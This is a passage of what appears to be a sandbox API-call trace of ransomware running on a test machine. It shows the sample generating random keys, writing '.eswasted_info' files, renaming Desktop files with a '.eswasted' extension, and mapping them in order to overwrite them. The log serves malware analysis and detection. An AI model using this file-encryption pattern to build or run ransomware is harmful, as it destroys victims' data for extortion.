[0073.303] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.303] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q n0IQ.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q n0iq.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.304] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.305] SetEndOfFile (hFile=0x11c) returned 1 [0073.305] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.305] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.305] lstrcpyW (in: lpString1=0x6f5d28, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q n0IQ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q n0iq.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q n0IQ.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q n0iq.bmp.eswasted")) returned 1 [0073.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Q n0IQ.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q n0iq.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.306] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.309] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.310] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.310] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.310] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.311] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.311] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.322] SetEndOfFile (hFile=0x11c) returned 1 [0073.357] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.357] CloseHandle (hObject=0x11c) returned 1 [0073.364] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.364] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.365] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.365] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.365] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvVsEr2gg3T3GhStRnG.avi") returned 65 [0073.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x6f5cc0 [0073.365] lstrcpyW (in: lpString1=0x6f5d42, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.365] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.365] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.366] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.366] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvVsEr2gg3T3GhStRnG.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvvser2gg3t3ghstrng.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.367] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.369] SetEndOfFile (hFile=0x11c) returned 1 [0073.369] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.369] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.369] lstrcpyW (in: lpString1=0x6f5d42, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvVsEr2gg3T3GhStRnG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvvser2gg3t3ghstrng.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvVsEr2gg3T3GhStRnG.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvvser2gg3t3ghstrng.avi.eswasted")) returned 1 [0073.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvVsEr2gg3T3GhStRnG.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rvvser2gg3t3ghstrng.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.370] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.373] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.374] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.374] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.374] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.375] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.375] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.384] SetEndOfFile (hFile=0x11c) returned 1 [0073.387] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.387] CloseHandle (hObject=0x11c) returned 1 [0073.389] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.389] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.390] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.390] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.390] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\seJI8-Y tOEM465GJ.mp3") returned 63 [0073.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x6f5cc0 [0073.390] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.390] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.390] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.391] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.391] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\seJI8-Y tOEM465GJ.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\seji8-y toem465gj.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.392] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.393] SetEndOfFile (hFile=0x11c) returned 1 [0073.393] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.394] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.394] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\seJI8-Y tOEM465GJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\seji8-y toem465gj.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\seJI8-Y tOEM465GJ.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\seji8-y toem465gj.mp3.eswasted")) returned 1 [0073.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\seJI8-Y tOEM465GJ.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\seji8-y toem465gj.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.395] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.398] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.399] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.399] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.399] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.400] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.400] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.419] SetEndOfFile (hFile=0x11c) returned 1 [0073.462] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0073.462] CloseHandle (hObject=0x11c) returned 1 [0073.464] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.464] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.465] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.465] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.465] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U-o1QsBEN50.ods") returned 57 [0073.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0073.465] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.465] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.466] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.466] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U-o1QsBEN50.ods.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u-o1qsben50.ods.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.466] WriteFile (in: hFile=0x11c, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.467] SetEndOfFile (hFile=0x11c) returned 1 [0073.468] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.468] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.468] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U-o1QsBEN50.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u-o1qsben50.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U-o1QsBEN50.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u-o1qsben50.ods.eswasted")) returned 1 [0073.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\U-o1QsBEN50.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\u-o1qsben50.ods.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0073.469] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0073.470] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.471] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.471] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.471] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.472] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.472] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.488] SetEndOfFile (hFile=0x11c) returned 1 [0073.493] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.493] CloseHandle (hObject=0x11c) returned 1 [0073.606] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.606] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.607] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.607] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.607] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V mob-KlbBH.avi") returned 57 [0073.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0073.607] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.607] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.608] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.608] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V mob-KlbBH.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v mob-klbbh.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.609] WriteFile (in: hFile=0x11c, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.611] SetEndOfFile (hFile=0x11c) returned 1 [0073.611] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.612] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.612] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V mob-KlbBH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v mob-klbbh.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V mob-KlbBH.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v mob-klbbh.avi.eswasted")) returned 1 [0073.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V mob-KlbBH.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v mob-klbbh.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.613] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0073.614] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.615] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.615] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.615] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.615] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.615] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.624] SetEndOfFile (hFile=0x11c) returned 1 [0073.627] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.627] CloseHandle (hObject=0x11c) returned 1 [0073.628] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.629] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.629] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.629] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.629] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\3pQu1NrivN5QHUMA.gif") returned 74 [0073.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x6f5cc0 [0073.630] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.630] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.630] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.630] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\3pQu1NrivN5QHUMA.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\3pqu1nrivn5qhuma.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.631] WriteFile (in: hFile=0x11c, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.632] SetEndOfFile (hFile=0x11c) returned 1 [0073.632] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.632] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.632] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\3pQu1NrivN5QHUMA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\3pqu1nrivn5qhuma.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\3pQu1NrivN5QHUMA.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\3pqu1nrivn5qhuma.gif.eswasted")) returned 1 [0073.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\3pQu1NrivN5QHUMA.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\3pqu1nrivn5qhuma.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.633] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.636] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.637] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.637] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.637] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.638] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.638] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.646] SetEndOfFile (hFile=0x11c) returned 1 [0073.648] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.648] CloseHandle (hObject=0x11c) returned 1 [0073.650] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.650] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.651] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.651] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 